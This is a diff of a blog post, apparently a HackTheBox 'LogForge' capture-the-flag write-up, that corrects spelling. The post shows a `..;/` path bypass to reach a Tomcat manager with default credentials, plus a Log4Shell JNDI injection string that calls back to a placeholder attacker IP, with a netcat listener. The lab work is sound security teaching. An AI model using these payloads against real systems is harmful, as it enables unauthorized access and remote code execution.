0xZon/0xZon.github.io/_posts/2022-1-17-HTB-Logforge.md

 # Tomcat Login

-This server has some misconfigurations that made it vulnerable to a tenquie described in a talk titled "Breaking Parser Logic" by Orange Tsai. https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
+This server has some misconfigurations that made it vulnerable to a technique described in a talk titled "Breaking Parser Logic" by Orange Tsai. https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf

 If I go to the site and type `http://10.10.11.138/test/..;/manager/html` I get prompted by a login.
 The default creds of `tomcat;tomcat` gets me in

 # Testing for Log4Shell

-The name of this machine is logforge and the a new vulnerability name "log4Shell" just came out so I'm assuming that one of these fields is being logged and is vulnerable.
+The name of this machine is logforge and a new vulnerability name "log4Shell" just came out so I'm assuming that one of these fields is being logged and is vulnerable.

-Log4j is a Java-based framework that makes it easy to store logs and information's.
+Log4j is a Java-based framework that makes it easy to store logs and information.
 There is a vulnerability called "Log4Shell" that allows attackers to execute arbitrary Java code on a server or other computer, or leak sensitive information.

 To test for this vulnerability I went through and put a test string of `${jndi:ldap://KALI_IP/file}` into different fields to see if it would get logged & exploited.
 If the server is vulnerable it will connect back to kali and request `file`.
-It doesnt matter what is there as we are just testing to see if we get a connection
+It doesn't matter what is there as we are just testing to see if we get a connection

 To set up and test use netcat to listen on port 389 `nc -lvnp 389`